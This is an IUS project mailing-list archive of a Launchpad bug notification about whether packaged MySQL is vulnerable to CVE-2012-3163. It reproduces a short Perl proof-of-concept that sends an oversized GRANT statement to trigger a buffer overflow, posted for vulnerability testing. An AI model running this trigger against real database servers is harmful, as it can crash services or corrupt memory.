
ius-coredev team mailing list archive

[Bug 1088513] Re: MySQL - CVE-2012-3163: Identify if IUS Packages are vulnerable

 

Attempting to identify issue using Perl script found at
http://seclists.org/fulldisclosure/2012/Dec/4

[code]
#!/usr/bin/perl

  use strict;
  use DBI();

  # Connect to the database.
  print "== Connecting to database ==\n";
  my $dbh = DBI->connect("DBI:mysql:database=test;host=localhost;",
                         "jeffrey", "secret",
                         {'RaiseError' => 1});
  print "== Connected ==\n";


  print "== Creating large string for buffer overflow ==\n";
  $a ="A" x 100000;

  print "== Attempting to grant with large string ==\n";
  my $sth = $dbh->prepare("grant file on $a.* to 'user'\@'%' identified by 'secret';");

  $sth->execute();
[/code]

-- 
You received this bug notification because you are a member of IUS Core
Development, which is subscribed to IUS Community Project.
https://bugs.launchpad.net/bugs/1088513

Title:
  MySQL - CVE-2012-3163: Identify if IUS Packages are vulnerable

Status in IUS Community Project:
  Won't Fix

Bug description:
  Redhat Bug Report:

       https://bugzilla.redhat.com/show_bug.cgi?id=881064#c6

To manage notifications about this bug go to:
https://bugs.launchpad.net/ius/+bug/1088513/+subscriptions

